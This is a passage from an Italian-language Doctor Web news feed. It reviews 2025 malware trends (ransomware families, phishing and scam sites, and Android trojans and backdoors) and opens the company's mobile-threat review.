    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di una versione impacchettata del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; scritto nel linguaggio di script AutoIt. Viene distribuita come parte di un gruppo di diverse applicazioni malevole: un cryptominer, un backdoor e un modulo per la distribuzione autonoma. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; esegue varie azioni malevole che ostacolano il rilevamento del payload principale.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Rispetto al 2024, nel 2025 le richieste degli utenti interessati dai programmi trojan ransomware di criptazione pervenuti al Servizio di supporto tecnico Doctor Web sono state il 35,98% in meno. La dinamica di registrazione delle richieste di decriptazione di file è presentata sul diagramma sotto.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;I ransomware di criptazione più diffusi nel 2025&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;(23,22% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione anche conosciuto come Mimic. Durante la ricerca dei file target da criptare, il trojan utilizza la libreria [string]everything.dll[/string] del programma legittimo Everything, progettato per la ricerca istantanea di file su computer Windows.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;(3,33% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione basato sul codice sorgente del trojan encoder Conti. Cripta i file tramite l'algoritmo ChaCha20. Dopo la liquidazione di una serie di server di comando e controllo dei malintenzionati e la divulgazione delle chiavi di crittografia RSA private, per alcune varianti di questo programma malevolo è disponibile la decriptazione dei file colpiti.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;(2,50% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione conosciuto come Macop (una delle varianti di questo trojan è &lt;b&gt;Trojan.Encoder.30572&lt;/b&gt;). Ha dimensioni ridotte, di circa 30-40 Kbyte. Questo è in parte dovuto al fatto che il trojan non porta con sé librerie crittografiche di terze parti, e per la criptazione e la generazione delle chiavi si avvale esclusivamente delle funzioni CryptoAPI. Per la criptazione di file utilizza l'algoritmo AES-256, e le chiavi stesse vengono cifrate tramite RSA-1024.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;(2,31% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione, gli artefatti in cui indicano il coinvolgimento nella sua creazione del gruppo di hacker C77L.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;(2,13% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan ransomware che ha più versioni. Le sue varianti attuali criptano i file con l'algoritmo AES-256+RSA.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Nel 2025 gli analisti internet dell'azienda Doctor Web osservavano una crescita del numero di siti di phishing creati per il furto degli account del programma di messaggistica Telegram. I malintenzionati adoperavano vari schemi: false pagine di autenticazione e autorizzazione, falsi messaggi dal servizio di supporto Telegram che avvisavano di presunte violazioni identificate durante l'uso del programma di messaggistica e della necessità di eseguire una "verifica" dell'account ecc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito di phishing che informa della necessità di eseguire una verifica dell'account Telegram in relazione a una certa violazione delle condizioni di uso del servizio&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I simili siti venivano creati anche per gli utenti di altri servizi web, ad esempio, piattaforme di gioco, negozi online ecc. Le falsificazioni potevano avere l'aspetto delle vere risorse internet e suggerivano di eseguire l'accesso all'account. Se gli utenti cadevano nella trappola, le informazioni confidenziali finivano nelle mani dei malintenzionati.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito del servizio Steam visualizza un modulo di phishing per l'inserimento di login e password&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli utenti di nuovo riscontravano varianti di vario genere di risorse internet fraudolente che offrivano tutti i tipi di omaggi e buoni, la partecipazione a certe "promozioni vantaggiose". Risultavano diffusi i falsi siti dei marketplace russi, dove gli visitatori presumibilmente potrebbero partecipare a un'estrazione a premi. La vincita su tali siti era programmata in anticipo, mentre per "riceverla", alla vittima veniva chiesto di effettuare un determinato pagamento, ad esempio, sotto forma di presunta imposta, e quindi per la consegna della merce e la sua assicurazione. In altre varianti dello schema fraudolento, la merce richiesta presumibilmente non sarebbe disponibile, ma invece di essa verrebbe offerto l'equivalente in denaro. Per "ricevere" i soldi, l'utente anche doveva effettuare una serie di pagamenti: sotto forma di una tassa, un'assicurazione ecc. Alla fine la vittima non riceveva alcun premio.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di falso sito di marketplace che suggerisce di partecipare a "un'estrazione a premi"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Varianti di tali schemi erano i falsi siti di compagnie di trasporto rivolti agli abitanti di Regno Unito. Invitavano a partecipare all'estrazione di carte trasporti che presumibilmente sarebbero correlati a un determinato evento e consentirebbero di usare gratis i servizi di trasporto pubblico. Dopo che le vittime "vincevano", i truffatori chiedevano a loro di fornire i dati personali e pagare una piccola "commissione".&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito truffa che presumibilmente a nome di una compagnia di trasporto suggerisce di partecipare a "un'estrazione della carta"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Rimanevano attuali gli svariati siti fraudolenti a tema finanziario. Di nuovo erano popolari tra i malintenzionati le risorse che suggerivano di guadagnare con il trading con l'utilizzo di sistemi automatizzati basati su certi algoritmi unici e tecnologie di intelligenza artificiale. I simili siti vengono creati per abitanti di molti paesi. Il più spesso, su di essi vengono chiesti i dati personali per registrare "la richiesta" o "l'account", dopodiché le informazioni finiscono nelle mani dei malintenzionati che le utilizzano a loro discrezione. Successivamente loro possono rivendere i dati o continueranno ad attirare le potenziali vittime verso il falso servizio di investimento, chiedendo di versare denaro sul conto di "trading".&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti truffa che offrivano l'accesso a una "piattaforma di investimento" su base di tecnologie di intelligenza artificiale presumibilmente era legato ad Apple corporation&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Molti di questi siti sono costruiti sulla base di modelli simili sotto forma di falsa chat con un "assistente virtuale" o un "collaboratore" di una determinata azienda, a cui nome presumibilmente i truffatori comunicano con la potenziale vittima. Agli utenti viene suggerito di rispondere a una serie di domande e quindi fornire i dati personali.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Su uno dei siti i malintenzionati suggerivano agli utenti da Francia di ottenere l'accesso a un software di trading automatizzato inesistente, TraderAI, che presumibilmente consentirà di guadagnare da 3.500 €&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Una delle risorse pubblicizzava un servizio di investimento, presumibilmente costruito direttamente sulla base del servizio di messaggistica Telegram. Il sito prometteva un reddito di 10.000 € al mese dal trading automatico sulle azioni di aziende globali "direttamente nel browser telefonico".&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito dei truffatori invita a unirsi alla "piattaforma Telegram" che presumibilmente eseguirebbe il trading su azioni in autonomo&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I malintenzionati proponevano, inoltre, alle potenziali vittime di guadagnare tramite i "bot di trading", presumibilmente creati con la partecipazione di grandi aziende e servizi, quale Telegram, WhatsApp, TikTok e altri ancora&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito che invitava a utilizzare un bot di trading inesistente, presumibilmente legato al sistema di messaggistica WhatsApp&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante il 2025, i nostri analisti internet hanno rilevato nuovi siti fraudolenti che invitavano a investire nel settore petrolifero e del gas gli utenti da molti paesi, inclusi Russia, paesi CSI ed europei. Su tali siti, nella maggior parte dei casi, alle potenziali vittime anche vengono chieste le informazioni personali: nome, cognome, numero di cellulare, indirizzo email ecc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito fraudolento volto ai cittadini di Kirghizistan suggerisce loro di "guadagnare con il petrolio e gas" promettendo un cospicuo reddito&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Comparivano nuovamente i siti truffa che suggerivano di ottenere un "sostegno statale" sotto forma di bonus o compensazioni. Ad esempio, nel segmento di internet russo erano diffuse le risorse truffa presumibilmente legate al portale web dei servizi statali Gosuslugi.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito truffa, presumibilmente legato al servizio web Gosuslugi, che prometteva agli utenti russi pagamenti stabili da parte dello Stato e di una grande compagnia petrolifera e del gas. Per "partecipare" al programma dei pagamenti, alla vittima veniva chiesto di fornire i dati personali&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri specialisti hanno registrato anche la comparsa di ulteriori siti di falsi progetti di formazione. Invitavano gli utenti a seguire vari corsi di formazione per migliorare la propria alfabetizzazione finanziaria, imparare una determinata professione ecc. Per "accedere" alla formazione, le potenziali vittime, come in molti altri schemi simili, anche dovevano fornire le loro informazioni personali.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti truffaldini invitava a imparare l'inglese&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli analisti internet Doctor Web rivelavano nuovi siti fraudolenti per la vendita di biglietti teatrali. Su tali risorse i malintenzionati suggeriscono alle potenziali vittime di acquistare biglietti a prezzi convenienti, tuttavia, dopo averli pagati, gli utenti non li ricevono.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito truffa che vende biglietti teatrali inesistenti&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Oltre a ciò, si sono diffusi anche nuovi falsi siti di cinema privati. Come nel caso dei biglietti teatrali, alle potenziali vittime viene proposto di acquistare biglietti cinematografici, ma in fin dei conti loro solo consegnano i propri soldi ai malintenzionati.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito di uno dei cinema privati&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2025 gli utenti di Android il più spesso riscontravano i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, nonché i programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che invece di fornire le funzionalità dichiarate, possono caricare vari siti web, inclusi quelli malevoli e fraudolenti. Si registrava una crescita dell'attività delle applicazioni trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;. Rappresentano minacce multifunzionali che i malintenzionati incorporano nel firmware di dispostivi Android. Oltre a ciò, si osservava una crescita del numero di attacchi dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Allo stesso tempo, è diminuita l'attività dei banker &lt;b&gt;Android.SpyMax&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Nell'anno passato gli attori di minacce hanno continuato a utilizzare le varie tecniche di protezione dei malware per SO Android. Una di esse era il metodo di conversione di codice DEX in codice C (conosciuto come DCC o DEX to C).&lt;/p&gt;

&lt;p&gt;Le applicazioni indesiderate più diffuse sono stati i programmi &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;. Suggeriscono agli utenti di completare vari compiti in cambio di premi virtuali e promettono la possibilità di convertire la ricompensa in denaro reale. Ma in realtà, in essi non c'è questa possibilità. Oltre a ciò, venivano frequentemente rilevate sui dispositivi protetti le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. Quelle prime imitano il funzionamento di antivirus e rilevano minacce inesistenti, offrendo "l'eliminazione" dell'infezione dopo l'acquisto di una versione completa. Quelle seconde rappresentano applicazioni che sono state modificate tramite un popolare servizio cloud. Durante la modifica ad esse vengono aggiunti autorizzazioni di sistema pericolose e un codice offuscato il cui scopo non può essere controllato.&lt;/p&gt;

&lt;p&gt;I programmi modificati tramite l'utility NP Manager (vengono rilevati come &lt;b&gt;Tool.NPMod&lt;/b&gt;) sono stati i software potenzialmente pericolosi più diffusi. L'utility offusca il codice delle applicazioni modificate e consente di aggirare il controllo della loro firma digitale. Risultano i programmi pubblicitari più attivi nel 2025 le mod di WhatsApp estranee (&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;) che aprono automaticamente link pubblicitari durante l'uso dell'app di messaggistica.&lt;/p&gt;

&lt;p&gt;Nel 2025 sono stati rivelati nuovi casi di infezione dei firmware di dispositivi Android. La nostra azienda ha avvisato di uno di tali casi ad aprile. I malintenzionati hanno preinstallato un'applicazione malevola, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, nell'area di sistema di alcuni modelli di smartphone economici, e con l'ausilio di essa rubavano la criptovaluta degli utenti. Altri attaccanti hanno potuto incorporare i pericolosi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; nel firmware di altri modelli di smartphone Android. Oltre a ciò, sono stati registrati ulteriori casi di infezione dei firmware di TV box Android da nuove versioni del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, che la nostra azienda &lt;a href="https://news.drweb-av.it/show/?i=14900" target="_blank"&gt;ha scoperto&lt;/a&gt; nel 2024.&lt;/p&gt;

&lt;p&gt;Nel corso dell'anno passato, il laboratorio antivirus Doctor Web ha individuato una serie di applicazioni malevole pericolose. Ad aprile abbiamo parlato del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, che era nascosto in un programma cartografico modificato da attori di minacce, Alpine Quest, e attaccava i militari russi. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trasmetteva ai malintenzionati dati sul numero di cellulare e sugli account, raccoglieva i contatti dalla rubrica, la geolocalizzazione del dispositivo infetto ed informazioni sui file in esso memorizzati. Era in grado, inoltre, di rubare determinati file su comando degli attaccanti. In particolare, a loro interessavano documenti riservati trasmessi tramite servizi di messaggistica, nonché il file di log delle localizzazioni del programma Alpine Quest.&lt;/p&gt;

&lt;p&gt;Ad agosto i nostri specialisti hanno avvertito del backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; che i malintenzionati distribuivano sotto le apparenze di un antivirus attraverso messaggi privati nelle app di messaggistica. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; ruba informazioni confidenziali e consente di spiare gli utenti. L'obiettivo principale di questo backdoor erano i collaboratori del business russo.&lt;/p&gt;

&lt;p&gt;Ad ottobre abbiamo informato di un backdoor multifunzionale, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, individuato dai nostri analisti dei virus in versioni modificate del programma di messaggistica Telegram X. Anche questo malware viene utilizzato per il furto di dati confidenziali, inclusi i login e le password di Telegram, gli SMS in arrivo, la corrispondenza nell'app di messaggistica e dati dagli appunti. Oltre a ciò, il backdoor consente ai malintenzionati di gestire completamente il programma di messaggistica e controllare l'account Telegram hackerato della vittima. Per gestire il backdoor, i cybercriminali utilizzavano sia il server C2 che il database Redis, il che in precedenza non si osservava nelle minacce Android. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; predominantemente era mirato agli abitanti di Indonesia e Brasile.&lt;/p&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel 2025 leggete la nostra &lt;a href="https://news.drweb-av.it/show/?i=15104" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Prospettive e probabili tendenze&lt;/h3&gt;

&lt;p&gt;Nel nuovo anno 2026, una delle minacce per gli utenti più diffuse probabilmente rimarranno i trojan pubblicitari, tramite cui i malintenzionati ottengono un reddito illegale. Ci si può aspettare che i cybercriminali utilizzeranno più spesso le applicazioni trojan bancarie, le quali anche permettono loro di arricchirsi.&lt;/p&gt;

&lt;p&gt;È possibile un'ulteriore crescita della popolarità dei vari strumenti e metodi che aiutano a nascondere l'attività malevola. Possiamo evidenziare tra questi l'utilizzo dei packer e programmi di offuscamento, programmi malevoli dropper e downloader a più fasi, nonché l'impiego della steganografia per l'occultamento del payload. Oltre a ciò, nel corso della creazione di malware, i cybercriminali, anche aventi poca esperienza nella programmazione, sempre più spesso ricorreranno agli assistenti di intelligenza artificiale. Come risultato, compariranno nuove famiglie di malware, e il numero di minacce crescerà.&lt;/p&gt;

&lt;p&gt;Di nuovo saranno sotto mira gli enti pubblici e le imprese, il che porterà a ulteriori attacchi mirati. Sono probabili, inoltre, nuovi casi di infezione dei firmware di smartphone Android, TV box e altri tipi di dispositivi mobili, specialmente nel segmento economico. Persisterà l'attività dei truffatori internet.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15104&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili per l'anno 2025</title><link>https://news.drweb-av.it/show/?i=15104&amp;lng=it&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 gennaio 2026&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;In primo piano&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;Nel 2025 gli utenti di dispositivi Android il più spesso riscontravano i trojan pubblicitari, nonché i programmi falsificazione utilizzati per scopi fraudolenti.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;I software indesiderati più diffusi, come anche l'anno precedente, sono state le applicazioni che suggeriscono in forma di gioco di completare determinati compiti e ricevere per questo premi virtuali. Promettono la possibilità di convertire la ricompensa in denaro reale, ma in realtà nei programmi tale possibilità non è prevista.&lt;/p&gt;

&lt;p&gt;Tra i software potenzialmente pericolosi, la maggiore attività si osservava da parte delle applicazioni modificate tramite l'utility NP Manager. Essa offusca e protegge dall'analisi e dal rilevamento il codice dei programmi che vengono modificati, nonché consente di aggirare il controllo della firma digitale dopo la loro modifica. I programmi pubblicitari più frequentemente rilevati sono state le mod non ufficiali del programma di messaggistica WhatsApp che aprono automaticamente link pubblicitari durante l'uso dell'app.&lt;/p&gt;

&lt;p&gt;L'anno passato sono stati registrati nuovi casi di incorporazione di programmi malevoli nel firmware di vari modelli di dispostivi Android. Abbiamo riferito uno di tali casi in primavera 2025. I cybercriminali hanno potuto preinstallare un trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, su alcuni modelli di smartphone economici, e con il suo ausilio rubare la criptovaluta delle vittime.&lt;/p&gt;

&lt;p&gt;Inoltre, in primavera i nostri specialisti hanno rilevato un programma trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, che gli attori di minacce avevano integrato in una delle versioni modificate del software cartografico Alpine Quest. L'applicazione malevola era mirata ai militari russi e veniva utilizzata per il cyberspionaggio.&lt;/p&gt;

&lt;p&gt;Alla fine di estate il laboratorio antivirus Doctor Web ha informato di un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, che veniva distribuito tramite i popolari programmi di messaggistica istantanea. I malintenzionati lo utilizzavano per spiare dipendenti di aziende russe e raccogliere le loro informazioni confidenziali.&lt;/p&gt;

&lt;p&gt;In autunno abbiamo parlato di un pericoloso backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, incorporato dai criminali informatici in mod del programma di messaggistica Telegram X Questo programma malevolo permetteva di violare gli account Telegram delle vittime e gestire l'applicazione di messaggistica stessa a nome degli utenti.&lt;/p&gt;

&lt;p&gt;Negli ultimi 12 mesi, il laboratorio antivirus Doctor Web ha rilevato sullo store di app Google Play più di 180 minacce, che in totale sono state scaricate oltre 2.165.000 volte. Includevano varianti diverse dei trojan che abbonano utenti a servizi a pagamento, i programmi falsificazione adoperati per scopi fraudolenti, nonché nuovi software pubblicitari e indesiderati.&lt;/p&gt;

&lt;p&gt;Nel 2025 gli autori di virus hanno continuato a utilizzare varie tecniche volte a complicare l'analisi dei programmi malevoli Android e aggirare il loro rilevamento da parte degli antivirus. Uno dei popolari metodi era la conversione di codice DEX in codice C. Inoltre, i nostri analisti dei virus hanno osservato che nella creazione di software malevoli i malintenzionati utilizzano gli assistenti AI, che aiutano a scrivere codice.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;TENDENZE DELL'ANNO PASSATO&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Trojan pubblicitari di nuovo sono le minacce Android più diffuse&lt;/li&gt;
        &lt;li&gt;Cresciuta la popolarità dell'utility NP Manager, che offusca il codice delle app Android modificate e consente di aggirare il controllo della loro firma digitale dopo la modifica&lt;/li&gt;
        &lt;li&gt;Aumentata l'attività dei trojan bancari&lt;/li&gt;
        &lt;li&gt;Rivelati nuovi casi di infezione dei firmware di dispositivi Android&lt;/li&gt;
        &lt;li&gt;Cybercriminali hanno continuato a utilizzare sia le tecniche già conosciute che quelle nuove di protezione dei malware dal rilevamento e analisi&lt;/li&gt;
        &lt;li&gt;Autori di virus utilizzavano attivamente assistenti AI per scrivere codice di applicazioni malevole&lt;/li&gt;
        &lt;li&gt;Comparsa di nuove minacce sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Eventi più interessanti del 2025&lt;/h3&gt;

